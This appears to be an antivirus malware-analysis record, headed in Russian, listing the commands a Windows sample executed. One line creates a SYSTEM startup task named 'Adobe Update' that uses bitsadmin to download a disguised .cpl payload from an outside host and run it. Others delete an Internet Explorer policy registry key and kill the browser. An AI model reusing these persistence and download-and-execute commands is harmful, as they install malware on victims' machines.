Техническая информация
- %WINDIR%\Tasks\Adobe Update.job
- '<SYSTEM32>\ping.exe' -n 60 127.0.0.1
- '<SYSTEM32>\ping.exe' -n 5 127.0.0.1
- '<SYSTEM32>\reg.exe' DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID /F
- '<SYSTEM32>\schtasks.exe' /RUN /TN "Adobe Update"
- '<SYSTEM32>\taskkill.exe' /im iexplore.exe /f
- '<SYSTEM32>\schtasks.exe' /Delete /TN "Adobe Update" /F
- '<SYSTEM32>\schtasks.exe' /CREATE /SC onstart /TN "Adobe Update" /TR "cmd /c ping -n 60 127.0.0.1 &bitsadmin /transfer My /Download /Priority HIGH http://vi##obox.pt/d001.jpg %TEMP%\d001.cpl &%TEMP%\d001.cpl" /ru SYSTEM
- iexplore.exe
- ClassName: 'MS_WINHELP' WindowName: '(null)'
- ClassName: '(null)' WindowName: '(null)'